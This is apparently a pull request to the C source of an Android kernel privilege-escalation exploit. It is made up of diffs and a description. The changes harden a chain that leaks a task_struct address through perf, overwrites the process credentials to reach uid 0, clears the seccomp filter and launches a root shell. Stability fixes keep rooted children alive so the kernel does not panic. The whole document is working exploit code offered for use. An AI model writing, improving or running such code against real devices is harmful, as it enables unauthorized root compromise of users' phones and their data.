### PR TITLE
core: harden the w2/w3 chain

### DIFF
--- a/src/core/main.c
+++ b/src/core/main.c
@@ -979,6 +979,9 @@ int run_exploit(int argc, char **argv) {
   uintptr_t child_task = 0;
   int child_alive = 1;
   int seccomp_ok = 0;
+  int ever_rooted = 0;
+  pid_t parked_child = -1;
+  int parked_cmd_w = -1;
 
   /* W2+W3 as a retryable chain: a missed W3 write or probe can kill the
    * child, so respawn and redo. */
@@ -988,8 +991,12 @@ int run_exploit(int argc, char **argv) {
       if (child > 0 && child_alive) {
         write(pipes.cmd_w, "P", 1);
         usleep(50000);
+        parked_child = child;
+        parked_cmd_w = pipes.cmd_w;
+      } else {
+        close(pipes.cmd_w);
       }
-      close(pipes.cmd_w); close(pipes.uid_r);
+      close(pipes.uid_r);
       child_alive = 1;
       seccomp_ok = 0;
     }
@@ -1062,9 +1069,10 @@ int run_exploit(int argc, char **argv) {
       write(pipes.cmd_w, "X", 1);
       close(pipes.cmd_w); close(pipes.uid_r);
       pr_warning("W2 failed after 15 rounds\n");
-      waitpid(child, NULL, 0);
+      waitpid(child, NULL, WNOHANG);
       return 1;
     }
+    ever_rooted = 1;
     /* rooted children never exit; chain failures park (P) */
 
     /* W3: clear the child's seccomp filter for the independent root shell
@@ -1144,16 +1152,24 @@ int run_exploit(int argc, char **argv) {
 
   sleep(2);
   TIMER("exploit complete");
+  if (!ever_rooted) {
+    pr_error("w2 never rooted a child\n");
+    return 1;
+  }
   if (child_alive) {
     if (write(pipes.cmd_w, "G", 1) != 1)
       pr_warning("failed to start root shell (child exited early)\n");
+    close(pipes.cmd_w);
+    waitpid(child, NULL, WNOHANG);
+    if (parked_cmd_w >= 0) close(parked_cmd_w);
+  } else if (parked_child > 0) {
+    if (write(parked_cmd_w, "G", 1) != 1)
+      pr_warning("failed to start root shell (parked child exited)\n");
+    close(parked_cmd_w);
+    waitpid(parked_child, NULL, WNOHANG);
+    parked_cmd_w = -1;
   } else {
     pr_warning("skipping late-load: child died during W3\n");
-  }
-  close(pipes.cmd_w);
-  /* park the child after forking the root shell */
-  if (child_alive) {
-    waitpid(child, NULL, WNOHANG);
   }
   close(pipes.uid_r);
 

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -798,7 +798,11 @@ static void child_main(struct child_pipes *p) {
     execl("/system/bin/sh", "sh", g_root_script_path, NULL);
     _exit(1);
   }
-  if (worker < 0) { close(p->uid_w); park_rooted_child(); }
+  if (worker < 0) {
+    pr_warning("fork() for root shell failed errno=%d; parking rooted child\n", errno);
+    close(p->uid_w);
+    park_rooted_child();
+  }
   /* the worker holds a fresh cred copy; this task holds the raw init_cred */
   close(p->uid_w);
   park_rooted_child();

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -688,13 +688,33 @@ static uintptr_t perf_find_task(void) {
 
 struct child_pipes { int task_r, task_w, cmd_r, cmd_w, uid_r, uid_w; };
 
+/* rooted exits kfree the static init_cred (w2 stores it with no
+ * get_cred). park forever, oom_score_adj -1000 so lmkd skips us. */
+static void park_rooted_child(void) {
+  FILE *f = fopen("/proc/self/oom_score_adj", "w");
+  if (f) {
+    fputs("-1000", f);
+    fclose(f);
+  }
+  for (;;) pause();
+}
+
 static void child_main(struct child_pipes *p) {
   close(p->task_r); close(p->cmd_w); close(p->uid_r);
   setpgid(0, 0);  /* own group; the parent kills the whole tree on timeout */
   fcntl(p->uid_w, F_SETFD, FD_CLOEXEC);  /* keep the probe pipe out of the
                                           * root shell / ksud chain */
   prctl(PR_SET_NAME, "ghostleaf_0123456789");
+  /* a real leak reproduces, a fluke vote winner does not. w2 writes to
+   * this address, so two runs must agree or the leak is discarded. */
   uintptr_t my_task = perf_find_task();
+  int leak_agreed = 0;
+  for (int i = 0; i < 2 && my_task; i++) {
+    uintptr_t again = perf_find_task();
+    if (again == my_task) { leak_agreed = 1; break; }
+    my_task = again;
+  }
+  if (!leak_agreed) my_task = 0;
   write(p->task_w, &my_task, sizeof(my_task));
   close(p->task_w);
   if (!my_task) _exit(1);
@@ -752,6 +772,12 @@ static void child_main(struct child_pipes *p) {
       uint32_t report =
         ((uint32_t)len << 8) | (uint32_t)(unsigned char)comm[0];
       write(p->uid_w, &report, sizeof(report));
+    }
+    else if (cmd == 'P') {
+      /* w2 rooted this task; park */
+      close(p->cmd_r);
+      close(p->uid_w);
+      park_rooted_child();
     }
     else if (cmd == 'G' || cmd == 'X') break;
   }

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -772,11 +772,10 @@ static void child_main(struct child_pipes *p) {
     execl("/system/bin/sh", "sh", g_root_script_path, NULL);
     _exit(1);
   }
-  if (worker < 0) { close(p->uid_w); _exit(1); }
-  /* Do not wait: the root shell runs to completion on its own; the parent
-   * polls the app-readable log. */
+  if (worker < 0) { close(p->uid_w); park_rooted_child(); }
+  /* the worker holds a fresh cred copy; this task holds the raw init_cred */
   close(p->uid_w);
-  _exit(0);
+  park_rooted_child();
 }
 
 static pid_t spawn_child(struct child_pipes *p) {
@@ -800,6 +799,9 @@ static int retry_write_stage(
     int leaf) {
   for (int attempt = 1; attempt <= attempts; attempt++) {
     pr_info("%s attempt %d/%d\n", stage, attempt, attempts);
+    /* the previous attempt's write can land after its verify read; check
+     * before paying for another heap spray */
+    if (attempt > 1 && verify(context)) return 1;
     if (attempt == 1) slab_drain();
     int routed = do_one_write(target, stage, mode, leaf);
     if (!routed) {
@@ -811,7 +813,8 @@ static int retry_write_stage(
     if (verify(context)) return 1;
     usleep(50000);
   }
-  return 0;
+  /* the last write can land after its verify read */
+  return verify(context);
 }
 
 static int verify_selinux_stage(void *context) {
@@ -948,13 +951,13 @@ int run_exploit(int argc, char **argv) {
   int seccomp_ok = 0;
 
   /* W2+W3 as a retryable chain: a missed W3 write or probe can kill the
-   * child, so respawn and redo instead of aborting. */
+   * child, so respawn and redo. */
   for (int round = 1; round <= 3; round++) {
     if (round > 1) {
-      pr_warning("W3 chain retry %d/3: respawning child\n", round);
+      pr_warning("W3 chain retry %d/3: parking rooted child\n", round);
       if (child > 0 && child_alive) {
-        kill(-child, SIGKILL);
-        waitpid(child, NULL, 0);
+        write(pipes.cmd_w, "P", 1);
+        usleep(50000);
       }
       close(pipes.cmd_w); close(pipes.uid_r);
       child_alive = 1;
@@ -973,21 +976,13 @@ int run_exploit(int argc, char **argv) {
     TIMER("perf_find_task done");
 
     if (!child_task) {
-      /* perf leaked nothing; respawn and retry once */
-      pr_info("perf returned 0, retrying...\n");
+      /* nothing rooted yet; safe to kill and burn a round */
+      pr_warning("perf leak did not reproduce; retrying next round\n");
+      kill(-child, SIGKILL);
       waitpid(child, NULL, 0);
-      child = spawn_child(&pipes);
-      if (child < 0) { pr_warning("retry fork failed\n"); return 1; }
-      child_task = 0;
-      read(pipes.task_r, &child_task, sizeof(child_task));
-      close(pipes.task_r);
-    }
-
-    if (!child_task) {
-      pr_warning("Cannot find task_struct (perf leak failed)\n");
-      close(pipes.cmd_w);
-      waitpid(child, NULL, 0);
-      return 1;
+      child_alive = 0;
+      close(pipes.cmd_w); close(pipes.uid_r);
+      continue;
     }
 
     pr_info("child_pid=%d child_task=0x%016zx\n", child, child_task);
@@ -1031,7 +1026,7 @@ int run_exploit(int argc, char **argv) {
     pselect_child_node = 1;
 
     int got_root = retry_write_stage(
-        "W2: cred", child_task + TASK_CRED_OFF, 2, 15, 50000,
+        "W2: cred", child_task + TASK_CRED_OFF, 2, 15, 100000,
         verify_w2_stage, &w2_context, 0);
     if (!got_root) {
       write(pipes.cmd_w, "X", 1);
@@ -1040,6 +1035,7 @@ int run_exploit(int argc, char **argv) {
       waitpid(child, NULL, 0);
       return 1;
     }
+    /* rooted children never exit; chain failures park (P) */
 
     /* W3: clear the child's seccomp filter for the independent root shell
      * (adb/shell skips). fork() re-arms TIF_SECCOMP while mode != 0, so mode
@@ -1125,22 +1121,9 @@ int run_exploit(int argc, char **argv) {
     pr_warning("skipping late-load: child died during W3\n");
   }
   close(pipes.cmd_w);
+  /* park the child after forking the root shell */
   if (child_alive) {
-    /* The child only forks the independent root shell and exits fast; keep
-     * a bounded wait in case it got stuck before the fork. */
-    int waited_ms = 0;
-    for (;;) {
-      pid_t r = waitpid(child, NULL, WNOHANG);
-      if (r == child || r < 0) break;
-      if (waited_ms >= 45000) {
-        pr_warning("child stuck before root shell handoff; killing group\n");
-        kill(-child, SIGKILL);
-        waitpid(child, NULL, 0);
-        break;
-      }
-      usleep(100000);
-      waited_ms += 100;
-    }
+    waitpid(child, NULL, WNOHANG);
   }
   close(pipes.uid_r);
 


### PR DESCRIPTION
parks rooted children instead of letting them exit. rooted exits kfree the static init_cred (w2 stores it with no get_cred), and enough of those corrupt the cred slab.

also gates w2 on a reproduced perf leak: a fluke vote winner does not reproduce, and w2 writes to the leaked address, so two runs must agree or the leak is discarded. write stages re-verify after their retry loop, and the chain burns a round on a missed leak instead of failing outright.

this seems to fix, at least in our experience, the panic after the child reaches uid=0 on 6.1.